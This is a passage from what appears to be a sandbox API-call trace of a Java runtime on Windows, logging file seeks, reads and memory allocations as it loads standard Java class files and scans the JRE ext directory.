(_Size=0x48) returned 0x121d93f0 [0099.073] malloc (_Size=0xa0) returned 0x122291c0 [0099.073] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a3b6, lpNewFilePointer=0x208b670, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b670*=54633398) returned 1 [0099.073] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b640, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208b640*=0xa0, lpOverlapped=0x0) returned 1 [0099.073] malloc (_Size=0x3c) returned 0x121d9440 [0099.073] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314ad28, lpNewFilePointer=0x208b270, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b270*=51686696) returned 1 [0099.073] ReadFile (in: hFile=0x134, lpBuffer=0x208b2c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b240, lpOverlapped=0x0 | out: lpBuffer=0x208b2c0*, lpNumberOfBytesRead=0x208b240*=0x1e, lpOverlapped=0x0) returned 1 [0099.100] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314ad81, lpNewFilePointer=0x208b2d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b2d0*=51686785) returned 1 [0099.100] ReadFile (in: hFile=0x134, lpBuffer=0x121b5ab0, nNumberOfBytesToRead=0xd17, lpNumberOfBytesRead=0x208b2a0, lpOverlapped=0x0 | out: lpBuffer=0x121b5ab0*, lpNumberOfBytesRead=0x208b2a0*=0xd17, lpOverlapped=0x0) returned 1 [0099.101] malloc (_Size=0x48) returned 0x121d9850 [0099.101] malloc (_Size=0xa0) returned 0x122291c0 [0099.101] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a351, lpNewFilePointer=0x208c0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0b0*=54633297) returned 1 [0099.101] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c080, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208c080*=0xa0, lpOverlapped=0x0) returned 1 [0099.101] malloc (_Size=0x38) returned 0x121da370 [0099.102] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314a1c8, lpNewFilePointer=0x208bcb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcb0*=51683784) returned 1 [0099.102] ReadFile (in: hFile=0x134, lpBuffer=0x208bd00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bc80, lpOverlapped=0x0 | out: lpBuffer=0x208bd00*, lpNumberOfBytesRead=0x208bc80*=0x1e, lpOverlapped=0x0) returned 1 [0099.102] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314a21d, lpNewFilePointer=0x208bd10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd10*=51683869) returned 1 [0099.102] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0xb0b, lpNumberOfBytesRead=0x208bce0, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208bce0*=0xb0b, lpOverlapped=0x0) returned 1 [0099.103] malloc (_Size=0x48) returned 0x121d93f0 [0099.103] malloc (_Size=0xa0) returned 0x122291c0 [0099.103] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a2ea, lpNewFilePointer=0x208c0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0b0*=54633194) returned 1 [0099.103] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c080, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208c080*=0xa0, lpOverlapped=0x0) returned 1 [0099.103] malloc (_Size=0x3a) returned 0x121d9d50 [0099.103] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31491e4, lpNewFilePointer=0x208bcb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcb0*=51679716) returned 1 [0099.103] ReadFile (in: hFile=0x134, lpBuffer=0x208bd00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bc80, lpOverlapped=0x0 | out: lpBuffer=0x208bd00*, lpNumberOfBytesRead=0x208bc80*=0x1e, lpOverlapped=0x0) returned 1 [0099.128] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314923b, lpNewFilePointer=0x208bd10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd10*=51679803) returned 1 [0099.129] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0xf8d, lpNumberOfBytesRead=0x208bce0, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208bce0*=0xf8d, lpOverlapped=0x0) returned 1 [0099.137] strlen (_Str="sun/util/locale/BaseLocale.class") returned 0x20 [0099.137] malloc (_Size=0x48) returned 0x121d9940 [0099.137] malloc (_Size=0xa0) returned 0x122291c0 [0099.137] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a29c, lpNewFilePointer=0x208c0e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0e0*=54633116) returned 1 [0099.137] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c0b0, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208c0b0*=0xa0, lpOverlapped=0x0) returned 1 [0099.137] malloc (_Size=0x21) returned 0x121d7a30 [0099.137] free (_Block=0x122291c0) [0099.138] strlen (_Str="sun/util/locale/BaseLocale.class") returned 0x20 [0099.138] strcpy (in: _Dest=0x208c260, _Source="sun/util/locale/BaseLocale.class" | out: _Dest="sun/util/locale/BaseLocale.class") returned="sun/util/locale/BaseLocale.class" [0099.138] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31485d2, lpNewFilePointer=0x208bce0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bce0*=51676626) returned 1 [0099.138] ReadFile (in: hFile=0x134, lpBuffer=0x208bd30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bcb0, lpOverlapped=0x0 | out: lpBuffer=0x208bd30*, lpNumberOfBytesRead=0x208bcb0*=0x1e, lpOverlapped=0x0) returned 1 [0099.156] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3148610, lpNewFilePointer=0x208bd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd40*=51676688) returned 1 [0099.156] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xbd4, lpNumberOfBytesRead=0x208bd10, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208bd10*=0xbd4, lpOverlapped=0x0) returned 1 [0099.156] free (_Block=0x121d9d50) [0099.157] free (_Block=0x121d93f0) [0099.164] strlen (_Str="sun/util/locale/BaseLocale$Cache.class") returned 0x26 [0099.164] malloc (_Size=0x48) returned 0x121d9710 [0099.164] malloc (_Size=0xa0) returned 0x122291c0 [0099.164] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a248, lpNewFilePointer=0x208ba60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ba60*=54633032) returned 1 [0099.164] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ba30, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208ba30*=0xa0, lpOverlapped=0x0) returned 1 [0099.164] malloc (_Size=0x27) returned 0x121d7b50 [0099.165] free (_Block=0x122291c0) [0099.165] strlen (_Str="sun/util/locale/BaseLocale$Cache.class") returned 0x26 [0099.165] strcpy (in: _Dest=0x208bbe0, _Source="sun/util/locale/BaseLocale$Cache.class" | out: _Dest="sun/util/locale/BaseLocale$Cache.class") returned="sun/util/locale/BaseLocale$Cache.class" [0099.165] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3147f98, lpNewFilePointer=0x208b660, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b660*=51675032) returned 1 [0099.165] ReadFile (in: hFile=0x134, lpBuffer=0x208b6b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b630, lpOverlapped=0x0 | out: lpBuffer=0x208b6b0*, lpNumberOfBytesRead=0x208b630*=0x1e, lpOverlapped=0x0) returned 1 [0099.185] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3147fdc, lpNewFilePointer=0x208b6c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b6c0*=51675100) returned 1 [0099.185] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x5f6, lpNumberOfBytesRead=0x208b690, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208b690*=0x5f6, lpOverlapped=0x0) returned 1 [0099.186] free (_Block=0x121d7a30) [0099.186] free (_Block=0x121d9940) [0099.213] strlen (_Str="sun/util/locale/BaseLocale$Key.class") returned 0x24 [0099.213] malloc (_Size=0x48) returned 0x121d9210 [0099.214] malloc (_Size=0xa0) returned 0x122291c0 [0099.214] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a1f6, lpNewFilePointer=0x208c330, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c330*=54632950) returned 1 [0099.214] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c300, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208c300*=0xa0, lpOverlapped=0x0) returned 1 [0099.214] malloc (_Size=0x25) returned 0x121d7e80 [0099.214] free (_Block=0x122291c0) [0099.214] strlen (_Str="sun/util/locale/BaseLocale$Key.class") returned 0x24 [0099.214] strcpy (in: _Dest=0x208c4b0, _Source="sun/util/locale/BaseLocale$Key.class" | out: _Dest="sun/util/locale/BaseLocale$Key.class") returned="sun/util/locale/BaseLocale$Key.class" [0099.214] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314738d, lpNewFilePointer=0x208bf30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf30*=51671949) returned 1 [0099.214] ReadFile (in: hFile=0x134, lpBuffer=0x208bf80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bf00, lpOverlapped=0x0 | out: lpBuffer=0x208bf80*, lpNumberOfBytesRead=0x208bf00*=0x1e, lpOverlapped=0x0) returned 1 [0099.215] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31473cf, lpNewFilePointer=0x208bf90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf90*=51672015) returned 1 [0099.215] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xbc9, lpNumberOfBytesRead=0x208bf60, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208bf60*=0xbc9, lpOverlapped=0x0) returned 1 [0099.215] free (_Block=0x121d7b50) [0099.215] free (_Block=0x121d9710) [0099.224] strlen (_Str="sun/util/locale/LocaleObjectCache$CacheEntry.class") returned 0x32 [0099.224] malloc (_Size=0x48) returned 0x121d9940 [0099.224] malloc (_Size=0xa0) returned 0x122291c0 [0099.224] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a196, lpNewFilePointer=0x208c2c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2c0*=54632854) returned 1 [0099.224] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c290, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208c290*=0xa0, lpOverlapped=0x0) returned 1 [0099.224] malloc (_Size=0x33) returned 0x121daab0 [0099.224] free (_Block=0x122291c0) [0099.224] strlen (_Str="sun/util/locale/LocaleObjectCache$CacheEntry.class") returned 0x32 [0099.225] strcpy (in: _Dest=0x208c440, _Source="sun/util/locale/LocaleObjectCache$CacheEntry.class" | out: _Dest="sun/util/locale/LocaleObjectCache$CacheEntry.class") returned="sun/util/locale/LocaleObjectCache$CacheEntry.class" [0099.225] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314709d, lpNewFilePointer=0x208bec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bec0*=51671197) returned 1 [0099.225] ReadFile (in: hFile=0x134, lpBuffer=0x208bf10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208be90, lpOverlapped=0x0 | out: lpBuffer=0x208bf10*, lpNumberOfBytesRead=0x208be90*=0x1e, lpOverlapped=0x0) returned 1 [0099.225] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31470ed, lpNewFilePointer=0x208bf20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf20*=51671277) returned 1 [0099.225] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x2a0, lpNumberOfBytesRead=0x208bef0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208bef0*=0x2a0, lpOverlapped=0x0) returned 1 [0099.225] free (_Block=0x121d7e80) [0099.225] free (_Block=0x121d9210) [0099.233] strlen (_Str="java/util/Locale$LocaleKey.class") returned 0x20 [0099.233] malloc (_Size=0x48) returned 0x121d9990 [0099.233] malloc (_Size=0xa0) returned 0x122291c0 [0099.233] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a148, lpNewFilePointer=0x208c340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c340*=54632776) returned 1 [0099.233] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c310, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208c310*=0xa0, lpOverlapped=0x0) returned 1 [0099.233] malloc (_Size=0x21) returned 0x121d80c0 [0099.233] free (_Block=0x122291c0) [0099.234] strlen (_Str="java/util/Locale$LocaleKey.class") returned 0x20 [0099.234] strcpy (in: _Dest=0x208c4c0, _Source="java/util/Locale$LocaleKey.class" | out: _Dest="java/util/Locale$LocaleKey.class") returned="java/util/Locale$LocaleKey.class" [0099.234] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3146bba, lpNewFilePointer=0x208bf40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf40*=51669946) returned 1 [0099.234] ReadFile (in: hFile=0x134, lpBuffer=0x208bf90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bf10, lpOverlapped=0x0 | out: lpBuffer=0x208bf90*, lpNumberOfBytesRead=0x208bf10*=0x1e, lpOverlapped=0x0) returned 1 [0099.269] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3146bf8, lpNewFilePointer=0x208bfa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfa0*=51670008) returned 1 [0099.269] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x4a5, lpNumberOfBytesRead=0x208bf70, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208bf70*=0x4a5, lpOverlapped=0x0) returned 1 [0099.270] free (_Block=0x121daab0) [0099.271] free (_Block=0x121d9940) [0099.290] strlen (_Str="sun/util/locale/LocaleUtils.class") returned 0x21 [0099.290] malloc (_Size=0x48) returned 0x121d92b0 [0099.290] malloc (_Size=0xa0) returned 0x122291c0 [0099.290] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a0f9, lpNewFilePointer=0x208bf80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf80*=54632697) returned 1 [0099.290] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bf50, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208bf50*=0xa0, lpOverlapped=0x0) returned 1 [0099.290] malloc (_Size=0x22) returned 0x121d7a30 [0099.291] free (_Block=0x122291c0) [0099.291] strlen (_Str="sun/util/locale/LocaleUtils.class") returned 0x21 [0099.291] strcpy (in: _Dest=0x208c100, _Source="sun/util/locale/LocaleUtils.class" | out: _Dest="sun/util/locale/LocaleUtils.class") returned="sun/util/locale/LocaleUtils.class" [0099.291] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3146125, lpNewFilePointer=0x208bb80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb80*=51667237) returned 1 [0099.291] ReadFile (in: hFile=0x134, lpBuffer=0x208bbd0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bb50, lpOverlapped=0x0 | out: lpBuffer=0x208bbd0*, lpNumberOfBytesRead=0x208bb50*=0x1e, lpOverlapped=0x0) returned 1 [0099.291] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3146164, lpNewFilePointer=0x208bbe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbe0*=51667300) returned 1 [0099.291] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xa56, lpNumberOfBytesRead=0x208bbb0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208bbb0*=0xa56, lpOverlapped=0x0) returned 1 [0099.292] free (_Block=0x121d80c0) [0099.292] free (_Block=0x121d9990) [0099.335] strlen (_Str="java/lang/CharacterData.class") returned 0x1d [0099.336] malloc (_Size=0x48) returned 0x121d95d0 [0099.336] malloc (_Size=0xa0) returned 0x122291c0 [0099.336] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a0ae, lpNewFilePointer=0x208c900, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c900*=54632622) returned 1 [0099.336] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c8d0, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208c8d0*=0xa0, lpOverlapped=0x0) returned 1 [0099.336] malloc (_Size=0x1e) returned 0x121d80c0 [0099.336] free (_Block=0x122291c0) [0099.336] strlen (_Str="java/lang/CharacterData.class") returned 0x1d [0099.336] strcpy (in: _Dest=0x208ca80, _Source="java/lang/CharacterData.class" | out: _Dest="java/lang/CharacterData.class") returned="java/lang/CharacterData.class" [0099.337] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3145b36, lpNewFilePointer=0x208c500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c500*=51665718) returned 1 [0099.337] ReadFile (in: hFile=0x134, lpBuffer=0x208c550, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c4d0, lpOverlapped=0x0 | out: lpBuffer=0x208c550*, lpNumberOfBytesRead=0x208c4d0*=0x1e, lpOverlapped=0x0) returned 1 [0099.413] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3145b71, lpNewFilePointer=0x208c560, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c560*=51665777) returned 1 [0099.414] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x5b4, lpNumberOfBytesRead=0x208c530, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c530*=0x5b4, lpOverlapped=0x0) returned 1 [0099.415] free (_Block=0x121d7a30) [0099.415] free (_Block=0x121d92b0) [0099.429] strlen (_Str="java/lang/CharacterDataLatin1.class") returned 0x23 [0099.430] malloc (_Size=0x48) returned 0x121d9cb0 [0099.430] malloc (_Size=0xa0) returned 0x122291c0 [0099.430] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a05d, lpNewFilePointer=0x208ca20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca20*=54632541) returned 1 [0099.430] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c9f0, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208c9f0*=0xa0, lpOverlapped=0x0) returned 1 [0099.431] malloc (_Size=0x24) returned 0x121d7e80 [0099.431] free (_Block=0x122291c0) [0099.431] strlen (_Str="java/lang/CharacterDataLatin1.class") returned 0x23 [0099.431] strcpy (in: _Dest=0x208cba0, _Source="java/lang/CharacterDataLatin1.class" | out: _Dest="java/lang/CharacterDataLatin1.class") returned="java/lang/CharacterDataLatin1.class" [0099.431] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3144905, lpNewFilePointer=0x208c620, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c620*=51661061) returned 1 [0099.431] ReadFile (in: hFile=0x134, lpBuffer=0x208c670, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c5f0, lpOverlapped=0x0 | out: lpBuffer=0x208c670*, lpNumberOfBytesRead=0x208c5f0*=0x1e, lpOverlapped=0x0) returned 1 [0099.511] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3144946, lpNewFilePointer=0x208c680, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c680*=51661126) returned 1 [0099.511] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x11f0, lpNumberOfBytesRead=0x208c650, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c650*=0x11f0, lpOverlapped=0x0) returned 1 [0099.511] free (_Block=0x121d80c0) [0099.512] free (_Block=0x121d95d0) [0099.568] strlen (_Str="java/util/HashMap$TreeNode.class") returned 0x20 [0099.568] malloc (_Size=0x48) returned 0x121d9b20 [0099.568] malloc (_Size=0xa0) returned 0x122291c0 [0099.568] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a00f, lpNewFilePointer=0x208cda0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cda0*=54632463) returned 1 [0099.568] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd70, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208cd70*=0xa0, lpOverlapped=0x0) returned 1 [0099.569] malloc (_Size=0x21) returned 0x121d80c0 [0099.569] free (_Block=0x122291c0) [0099.569] strlen (_Str="java/util/HashMap$TreeNode.class") returned 0x20 [0099.569] strcpy (in: _Dest=0x208cf20, _Source="java/util/HashMap$TreeNode.class" | out: _Dest="java/util/HashMap$TreeNode.class") returned="java/util/HashMap$TreeNode.class" [0099.569] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31427e9, lpNewFilePointer=0x208c9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9a0*=51652585) returned 1 [0099.569] ReadFile (in: hFile=0x134, lpBuffer=0x208c9f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c970, lpOverlapped=0x0 | out: lpBuffer=0x208c9f0*, lpNumberOfBytesRead=0x208c970*=0x1e, lpOverlapped=0x0) returned 1 [0099.651] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3142827, lpNewFilePointer=0x208ca00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca00*=51652647) returned 1 [0099.651] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x20de, lpNumberOfBytesRead=0x208c9d0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c9d0*=0x20de, lpOverlapped=0x0) returned 1 [0099.722] free (_Block=0x121d7e80) [0099.722] free (_Block=0x121d9cb0) [0099.752] ReadFile (in: hFile=0x210, lpBuffer=0x208ba00, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208b9d0, lpOverlapped=0x0 | out: lpBuffer=0x208ba00*, lpNumberOfBytesRead=0x208b9d0*=0x0, lpOverlapped=0x0) returned 1 [0099.755] strlen (_Str="java/io/FileInputStream$1.class") returned 0x1f [0099.755] malloc (_Size=0x48) returned 0x121d8fe0 [0099.755] malloc (_Size=0xa0) returned 0x122292e0 [0099.755] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419fc2, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=54632386) returned 1 [0099.755] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208cc70*=0xa0, lpOverlapped=0x0) returned 1 [0099.755] malloc (_Size=0x20) returned 0x121d7e80 [0099.755] free (_Block=0x122292e0) [0099.756] strlen (_Str="java/io/FileInputStream$1.class") returned 0x1f [0099.756] strcpy (in: _Dest=0x208ce20, _Source="java/io/FileInputStream$1.class" | out: _Dest="java/io/FileInputStream$1.class") returned="java/io/FileInputStream$1.class" [0099.756] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31425de, lpNewFilePointer=0x208c8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8a0*=51652062) returned 1 [0099.756] ReadFile (in: hFile=0x134, lpBuffer=0x208c8f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c870, lpOverlapped=0x0 | out: lpBuffer=0x208c8f0*, lpNumberOfBytesRead=0x208c870*=0x1e, lpOverlapped=0x0) returned 1 [0099.756] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314261b, lpNewFilePointer=0x208c900, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c900*=51652123) returned 1 [0099.756] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x1ce, lpNumberOfBytesRead=0x208c8d0, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208c8d0*=0x1ce, lpOverlapped=0x0) returned 1 [0099.756] free (_Block=0x121d80c0) [0099.756] free (_Block=0x121d9b20) [0099.761] CloseHandle (hObject=0x210) returned 1 [0099.761] wcslen (_String="C:\\Windows\\Sun\\Java\\lib\\ext\\meta-index") returned 0x26 [0099.761] malloc (_Size=0x58) returned 0x12228c40 [0099.761] wcscpy (in: _Dest=0x12228c40, _Source="C:\\Windows\\Sun\\Java\\lib\\ext\\meta-index" | out: _Dest="C:\\Windows\\Sun\\Java\\lib\\ext\\meta-index") returned="C:\\Windows\\Sun\\Java\\lib\\ext\\meta-index" [0099.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\Sun\\Java\\lib\\ext\\meta-index", nBufferLength=0x9, lpBuffer=0x208de28, lpFilePart=0x208de20 | out: lpBuffer="", lpFilePart=0x208de20*=0x0) returned 0x27 [0099.761] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Sun\\Java\\lib\\ext\\meta-index" (normalized: "c:\\windows\\sun\\java\\lib\\ext\\meta-index"), fInfoLevelId=0x0, lpFileInformation=0x208dbc0 | out: lpFileInformation=0x208dbc0*(dwFileAttributes=0xffffffff, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x2114050, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x119488c0, nFileSizeHigh=0x0, nFileSizeLow=0x208dc79)) returned 0 [0099.762] GetLastError () returned 0x3 [0099.762] free (_Block=0x12228c40) [0099.763] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0099.763] malloc (_Size=0x60) returned 0x1220f3a0 [0099.763] wcscpy (in: _Dest=0x1220f3a0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext" [0099.763] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0099.763] malloc (_Size=0x5a) returned 0x1220f640 [0099.763] wcscpy (in: _Dest=0x1220f640, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext" [0099.763] free (_Block=0x1220f3a0) [0099.764] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext")) returned 0x10 [0099.764] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0099.764] wcscat (in: _Dest=0x1220f640, _Source="\\*" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\*") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\*" [0099.764] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\*", lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb394937, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed1ee857, ftLastAccessTime.dwHighDateTime=0x1d709ec, 